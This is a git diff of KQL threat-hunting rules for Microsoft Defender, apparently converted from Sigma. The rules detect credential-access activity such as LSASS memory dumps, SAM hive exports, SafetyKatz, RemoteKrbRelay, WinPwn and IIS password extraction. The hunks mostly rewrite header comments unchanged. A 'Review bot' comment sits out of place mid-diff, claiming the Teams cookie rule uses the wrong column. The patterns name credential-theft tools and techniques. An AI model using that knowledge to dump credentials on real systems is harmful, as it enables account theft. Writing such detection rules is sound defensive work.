-
-DeviceFileEvents
+// Title: HackTool - QuarksPwDump Dump File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-10
+// Level: critical
+// Description: Detects a dump file written by QuarksPwDump password dumper
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
index b6c71489..fe699bbb 100644
--- a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - RemoteKrbRelay Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-06-27
-// Level: high
-// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1558.003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - RemoteKrbRelay Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-27
+// Level: high
+// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\RemoteKrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "RemoteKrbRelay.exe") or (ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -target " and ProcessCommandLine contains " -victim ") or (ProcessCommandLine contains "-rbcd " and (ProcessCommandLine contains "-cn " or ProcessCommandLine contains "--computername ")) or (ProcessCommandLine contains "-chp " and (ProcessCommandLine contains "-chpPass " and ProcessCommandLine contains "-chpUser ")) or (ProcessCommandLine contains "-addgroupmember " and ProcessCommandLine contains "-group " and ProcessCommandLine contains "-groupuser ") or ((ProcessCommandLine contains "interactive" or ProcessCommandLine contains "secrets" or ProcessCommandLine contains "service-add") and (ProcessCommandLine contains "-smb " and ProcessCommandLine contains "--smbkeyword "))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql
index 642a7667..9b37a669 100644
--- a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql
+++ b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - SafetyKatz Dump Indicator
-// Author: Markus Neis
-// Date: 2018-07-24
-// Level: high
-// Description: Detects default lsass dump filename generated by SafetyKatz.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Rare legitimate files with similar filename structure
-
-DeviceFileEvents
+// Title: HackTool - SafetyKatz Dump Indicator
+// Author: Markus Neis
+// Date: 2018-07-24
+// Level: high
+// Description: Detects default lsass dump filename generated by SafetyKatz.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare legitimate files with similar filename structure
+
+DeviceFileEvents
 | where FolderPath endswith "\\Temp\\debug.bin"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql
index da8d62a6..0ee7f2e0 100644
--- a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - SafetyKatz Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-20
-// Level: critical
-// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - SafetyKatz Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-20
+// Level: critical
+// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql
index 84427743..75abef80 100644
--- a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - SecurityXploded Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-12-19
-// Level: critical
-// Description: Detects the execution of SecurityXploded Tools
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - SecurityXploded Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-12-19
+// Level: critical
+// Description: Detects the execution of SecurityXploded Tools
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql
index a3e59eb1..16e14045 100644
--- a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql
+++ b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Typical HiveNightmare SAM File Export
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-23
-// Level: high
-// Description: Detects files written by the different tools that exploit HiveNightmare
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934
-// False Positives:
-// - Files that accidentally contain these strings
-
-DeviceFileEvents
+// Title: HackTool - Typical HiveNightmare SAM File Export
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-23
+// Level: high
+// Description: Detects files written by the different tools that exploit HiveNightmare
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934
+// False Positives:
+// - Files that accidentally contain these strings
+
+DeviceFileEvents
 | where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
index 9d2c5df5..10e49f69 100644
--- a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - WinPwn Execution
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023-12-04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-
-DeviceProcessEvents
+// Title: HackTool - WinPwn Execution
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-12-04
+// Level: high
+// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
index 187ef0d6..4b71e6fc 100644
--- a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
+++ b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
@@ -1,11 +1,11 @@
-// Title: Interesting Service Enumeration Via Sc.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-02-12
-// Level: low
-// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
-// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
-// MITRE Tactic: Credential Access
-// Tags: attack.t1003, attack.credential-access
-
-DeviceProcessEvents
+// Title: Interesting Service Enumeration Via Sc.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: low
+// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
+// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "query" and ProcessCommandLine contains "termservice" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
index 5581b8b5..b8ff3db6 100644
--- a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
+++ b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
@@ -1,12 +1,12 @@
-// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
-// Author: Thomas Patzke
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-// False Positives:
-// - NTDS maintenance
-
-DeviceProcessEvents
+// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
+// Author: Thomas Patzke
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - NTDS maintenance
+
+DeviceProcessEvents
 | where FolderPath endswith "\\ntdsutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
index 88b329e7..3e0f8ef2 100644
--- a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
+++ b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
@@ -1,12 +1,12 @@
-// Title: Loaded Module Enumeration Via Tasklist.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-02-12
-// Level: medium
-// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
-// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
-// In order to dump the process memory or perform other nefarious actions.
-// MITRE Tactic: Credential Access
-// Tags: attack.t1003, attack.credential-access
-
-DeviceProcessEvents
+// Title: Loaded Module Enumeration Via Tasklist.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: medium
+// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
+// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
+// In order to dump the process memory or perform other nefarious actions.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-m" or ProcessCommandLine contains "/m" or ProcessCommandLine contains "–m" or ProcessCommandLine contains "—m" or ProcessCommandLine contains "―m") and (FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe") and ProcessCommandLine contains "rdpcorets.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
index 7a57b6a5..43d11d20 100644
--- a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
+++ b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
@@ -1,12 +1,12 @@
-// Title: LSASS Dump Keyword In CommandLine
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-24
-// Level: high
-// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: LSASS Dump Keyword In CommandLine
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql
index 784863db..ed914fe8 100644
--- a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql
+++ b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql
@@ -1,12 +1,12 @@
-// Title: Lsass Full Dump Request Via DumpType Registry Settings
-// Author: @pbssubhash
-// Date: 2022-12-08
-// Level: high
-// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Legitimate application that needs to do a full dump of their process
-
-DeviceRegistryEvents
+// Title: Lsass Full Dump Request Via DumpType Registry Settings
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate application that needs to do a full dump of their process
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql
index 3caa51d8..468deece 100644
--- a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql
+++ b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql
@@ -1,12 +1,12 @@
-// Title: LSASS Process Dump Artefact In CrashDumps Folder
-// Author: @pbssubhash
-// Date: 2022-12-08
-// Level: high
-// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Rare legitimate dump of the process by the operating system due to a crash of lsass
-
-DeviceFileEvents
+// Title: LSASS Process Dump Artefact In CrashDumps Folder
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare legitimate dump of the process by the operating system due to a crash of lsass
+
+DeviceFileEvents
 | where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
index d75b0ba2..8c2cf94b 100644
--- a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
+++ b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
@@ -1,12 +1,12 @@
-// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023-10-19
-// Level: high
-// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Rare case of troubleshooting by an administrator or support that has to be investigated regardless
-
-DeviceFileEvents
+// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-10-19
+// Level: high
+// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare case of troubleshooting by an administrator or support that has to be investigated regardless
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql
index 51bdd5d6..04e5d0d0 100644
--- a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql
+++ b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql
@@ -1,10 +1,10 @@
-// Title: LSASS Process Memory Dump Files
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-11-15
-// Level: high
-// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-
-DeviceFileEvents
+// Title: LSASS Process Memory Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-15
+// Level: high
+// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
 | where (FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp" or FolderPath endswith "\\rustive.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdmp" or FolderPath contains "\\lsassdump") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or ((FolderPath contains "\\nanodump" or FolderPath contains "\\proc_") and FolderPath endswith ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql
index c7374d0b..3ff548be 100644
--- a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql
+++ b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql
@@ -1,10 +1,10 @@
-// Title: LSASS Process Reconnaissance Via Findstr.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-12
-// Level: high
-// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.006
-
-DeviceProcessEvents
+// Title: LSASS Process Reconnaissance Via Findstr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " -i \"lsass" or ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " –i \"lsass" or ProcessCommandLine contains " —i \"lsass" or ProcessCommandLine contains " ―i \"lsass" or ProcessCommandLine contains " -i lsass.exe" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains " –i lsass.exe" or ProcessCommandLine contains " —i lsass.exe" or ProcessCommandLine contains " ―i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql
index 49aed8f5..8c413bbd 100644
--- a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql
+++ b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql
@@ -1,10 +1,10 @@
-// Title: Microsoft IIS Connection Strings Decryption
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022-09-28
-// Level: high
-// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-
-DeviceProcessEvents
+// Title: Microsoft IIS Connection Strings Decryption
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: high
+// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql
index 36361a87..3d4a95cf 100644
--- a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql
+++ b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql
@@ -1,10 +1,10 @@
-// Title: Microsoft IIS Service Account Password Dumped
-// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
-// Date: 2022-11-08
-// Level: high
-// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-
-DeviceProcessEvents
+// Title: Microsoft IIS Service Account Password Dumped
+// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
+// Date: 2022-11-08
+// Level: high
+// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
index 447f1f17..5c885f46 100644
--- a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
@@ -1,10 +1,10 @@
-// Title: Microsoft Teams Sensitive File Access By Uncommon Applications
-// Author: @SerkinValery
-// Date: 2024-07-22
-// Level: medium
-// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1528
-
-DeviceFileEvents
+// Title: Microsoft Teams Sensitive File Access By Uncommon Applications
+// Author: @SerkinValery
+// Date: 2024-07-22
+// Level: medium
+// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceFileEvents
 | where (FileName contains "\\Microsoft\\Teams\\Cookies" or FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql
index 985f4f6f..051b1a74 100644
--- a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql
+++ b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql
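Review bot: The `| where` clause filters on `FileName contains "\\Microsoft\\Teams\\Cookies"` and `FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb"`, but in the Defender DeviceFileEvents schema `FileName` carries only the bare file name while the directory lives in `FolderPath`, so a backslash-qualified path can never match and the rule appears to be inert. Every other path-matching rule in this diff (for example the ntds.dit and CrashDumps rules) uses `FolderPath`, so the intended filter is most likely `(FolderPath contains "\\Microsoft\\Teams\\Cookies" or FolderPath contains "\\Microsoft\\Teams\\Local Storage\\leveldb")`. The `not(InitiatingProcessFolderPath endswith ...)` exclusion already uses a path column and needs no change. This line is context in the hunk, so the defect predates the commit, but the conversion script should not carry it forward.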
@@ -1,10 +1,10 @@
-// Title: Mount Execution With Hidepid Parameter
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-01-12
-// Level: medium
-// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.defense-evasion, attack.t1564
-
-DeviceProcessEvents
+// Title: Mount Execution With Hidepid Parameter
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-12
+// Level: medium
+// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.t1564
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "hidepid=2" and ProcessCommandLine contains " -o ") and FolderPath endswith "/mount"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
index 7675a517..7f104c2a 100644
